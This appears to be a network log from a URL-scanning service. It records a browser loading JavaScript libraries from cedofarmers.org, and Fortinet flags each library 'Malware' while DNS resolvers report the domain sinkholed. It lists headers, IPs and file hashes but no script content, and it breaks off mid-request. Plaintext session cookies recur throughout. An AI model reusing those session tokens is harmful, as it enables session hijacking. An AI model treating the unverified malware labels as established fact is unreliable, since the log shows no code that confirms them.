Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 4109
content-type: application/javascript
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/js/jquery.waypoints.min.js
192.185.57.117 200 OK 3.2 kB URL HTTP/2 cedofarmers.org/js/jquery.waypoints.min.js
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type Unicode text, UTF-8 text, with very long lines (8668)
Hash fb0f2e418324ef4b2ccef62b8460160d
9e1a7fd820cb33d4cbf8620dfa28e284fdfc6a8e
d458a5bdf76d7529e89e204b4d6de5d4c36d25f78e4e5ad1db0b6aef4f53851b
Analyzer Verdict Alert fortinet Malware
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /js/jquery.waypoints.min.js HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 3151
content-type: application/javascript
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/js/aos.js
192.185.57.117 200 OK 6.8 kB URL HTTP/2 cedofarmers.org/js/aos.js
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type ASCII text, with very long lines (14212)
Hash 479cdf80b809326d4db924af9c776aed
19a6c5f3d7d22dabc779ca8211c9b77e46be2ba6
c297112630880d8480a1659d77b2a72afc346de97dab6826bda00903732b7da7
Analyzer Verdict Alert fortinet Malware
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /js/aos.js HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 6766
content-type: application/javascript
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/js/owl.carousel.min.js
192.185.57.117 200 OK 16 kB URL HTTP/2 cedofarmers.org/js/owl.carousel.min.js
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type ASCII text, with very long lines (32035)
Hash ba718faf7d0b70331002a08b21cb59a9
e95351f57800bcccb528cba3f019b0ed71b7dd95
d4c7012b6c81af915538208c9ebab6a2d99ef16b57d411b74e3191b5ba8db169
Analyzer Verdict Alert fortinet Malware
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /js/owl.carousel.min.js HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 15509
content-type: application/javascript
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/js/jquery.easing.1.3.js
192.185.57.117 200 OK 2.8 kB URL HTTP/2 cedofarmers.org/js/jquery.easing.1.3.js
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Hash d393d9f57ac1e235965f6a8115bc497f
28b5b3eb6dafc4bf8f3f27e209bdb62931470de2
02bf96fb3412a080cc6f155e8952e10d3f1d204a581e1aa08d4d3c095096a27e
Analyzer Verdict Alert fortinet Malware
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /js/jquery.easing.1.3.js HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 2789
content-type: application/javascript
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/js/jquery.animateNumber.min.js
192.185.57.117 200 OK 747 B URL HTTP/2 cedofarmers.org/js/jquery.animateNumber.min.js
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type ASCII text, with very long lines (527)
Hash 40bca4537ed2129cb598f9ffbf29141c
68ad9269449269e54fd761b91d58a0e947ea21f7
6749cb11f6ec74583b49f9b5ff2f75929d78c22af7184a008796ba377dc7fb8b
Analyzer Verdict Alert fortinet Malware
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /js/jquery.animateNumber.min.js HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 747
content-type: application/javascript
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
use.fontawesome.com/releases/v5.7.2/webfonts/fa-solid-900.woff2
172.64.132.15 200 OK 74 kB URL HTTP/2 use.fontawesome.com/releases/v5.7.2/webfonts/fa-solid-900.woff2
IP 172.64.132.15:0
File type Web Open Font Format (Version 2), TrueType, length 74348, version 329.31064
Hash 462806316fea535a6a57651bc2b000b0
80644191098f863f25be27841c0d92c452cf2327
4f9ee3d8f6e621642979e6a8f7e75c57cb9da34918cc08a38abfe178dbae1dd2
GET /releases/v5.7.2/webfonts/fa-solid-900.woff2 HTTP/1.1
Host: use.fontawesome.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: https://cedofarmers.org
Connection: keep-alive
Referer: https://use.fontawesome.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
date: Tue, 08 Nov 2022 22:20:37 GMT
content-type: font/woff2
content-length: 74348
x-amz-id-2: iJgmlNxQi/sKXR3wPLd0PCN+rnt3KjjmZAU6Rzj56CldD3vsptyy4CPSi/OjSMIuasxBvW21qPI=
x-amz-request-id: B5ZNH65HPX6SY9EY
access-control-allow-origin: *
access-control-allow-methods: GET
access-control-max-age: 3000
vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method, Accept-Encoding
last-modified: Wed, 30 Jun 2021 15:46:18 GMT
etag: "462806316fea535a6a57651bc2b000b0"
cache-control: max-age=31556926
cf-cache-status: MISS
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KFLkF7XvgM4j%2BRditTT%2F6vQFxcP9k9yeDdBj6uV85OaGTcrhyJI0cT60qImBkCL4Doo9UmSTPdxC5AONi4jZ0EXVDLHqNqrkD386VPu6C3ZjwK98eTSL4ARtmHm09CZfs8%2FTqedw"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 7671b26dcf3275c6-LHR
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2
cedofarmers.org/js/jquery.timepicker.min.js
192.185.57.117 200 OK 6.3 kB URL HTTP/2 cedofarmers.org/js/jquery.timepicker.min.js
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type ASCII text, with very long lines (15516)
Hash 08067ede5d206b26fccbb23d95361eb2
c64f0b991ed0460e73f4d84ef656960b3686f15e
3bf889f378d89317e9f7eeca4a4c9eab04c50a9c684e3bc6920bf5aa6db96d69
Analyzer Verdict Alert fortinet Malware
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /js/jquery.timepicker.min.js HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 6300
content-type: application/javascript
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/js/scrollax.min.js
192.185.57.117 200 OK 3.5 kB URL HTTP/2 cedofarmers.org/js/scrollax.min.js
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type ASCII text, with very long lines (567)
Hash 86a4f5314ead33144666591358283dbf
e96f5ee479f0acd04dc7f05e81bd1b17dd045a78
d214654b8c08d790c05d134b7d00ddee5616b96400c5ab79ef21bbc95312156a
Analyzer Verdict Alert fortinet Malware
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /js/scrollax.min.js HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 3479
content-type: application/javascript
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/js/bootstrap-datepicker.js
192.185.57.117 200 OK 15 kB URL HTTP/2 cedofarmers.org/js/bootstrap-datepicker.js
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Hash 2b79093933df55bc5c7ef67c538716d6
dcd4c757ffb7e12e2fdcb79bfb63a89904ddcdb0
63c105faabd1a5e17ae5f3c9d38d2496e244b2f9eb212089a0370bc737006494
Analyzer Verdict Alert fortinet Malware
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /js/bootstrap-datepicker.js HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 15126
content-type: application/javascript
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
r3.o.lencr.org/
23.36.76.226 200 OK 503 B IP 23.36.76.226:0
ASN #20940 Akamai International B.V.
Hash 4599ea4ab89bca0461dfc4e86cf90610
d513a3fca97e06dbc1a6cdd02fbdd3c7253c865a
6056ef181a66539dd449318a89c133c3711e3244394126a66b8ebd29cff4692b
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "6056EF181A66539DD449318A89C133C3711E3244394126A66B8EBD29CFF4692B"
Last-Modified: Tue, 08 Nov 2022 00:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=9386
Expires: Wed, 09 Nov 2022 00:57:03 GMT
Date: Tue, 08 Nov 2022 22:20:37 GMT
Connection: keep-alive
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fc6fadd94-b1a4-4bdc-bcf4-b6bade4840a0.jpeg
34.120.237.76 200 OK 10 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fc6fadd94-b1a4-4bdc-bcf4-b6bade4840a0.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3
Hash 4e2853cc6ec6223160471401e6871f4b
f052e1f8b2bf4a8eeecfa5b82e27ada1b7719a0c
bf4b9145ea043d87a30fd3aeeae21a1a0aa27004cd2467e7aa843bc894ae1f60
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fc6fadd94-b1a4-4bdc-bcf4-b6bade4840a0.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 10462
x-amzn-requestid: 6dc7dc5c-88e9-4550-abf0-f16965ab7cd3
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: bF_38GKXoAMFwSA=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-636579cc-28ea4125437c31cc34683fb7;Sampled=0
x-amzn-remapped-date: Fri, 04 Nov 2022 20:45:00 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: Q0yZmbExDP4tH0n1n2qj_NR2Mv_y_dsO0LJ1RKZoS6Me-NLbhpUWqw==
via: 1.1 470e3fe246a660ba6ace67a79f78d246.cloudfront.net (CloudFront), 1.1 ee8246c5442dace7525c74f6a799bb46.cloudfront.net (CloudFront), 1.1 google
date: Tue, 08 Nov 2022 09:08:56 GMT
age: 47501
etag: "f052e1f8b2bf4a8eeecfa5b82e27ada1b7719a0c"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F1b197dc2-1415-4c19-8d36-1fa334168ba5.jpeg
34.120.237.76 200 OK 9.3 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F1b197dc2-1415-4c19-8d36-1fa334168ba5.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3
Hash 29429581f8dc762c69c5916009f70080
9265cae98aa663a5498925b70079abdd8e7031fd
c3deee74c80905a1e92b84868b9987cb30ad7a210dca066b97c325cc2c83872e
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F1b197dc2-1415-4c19-8d36-1fa334168ba5.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
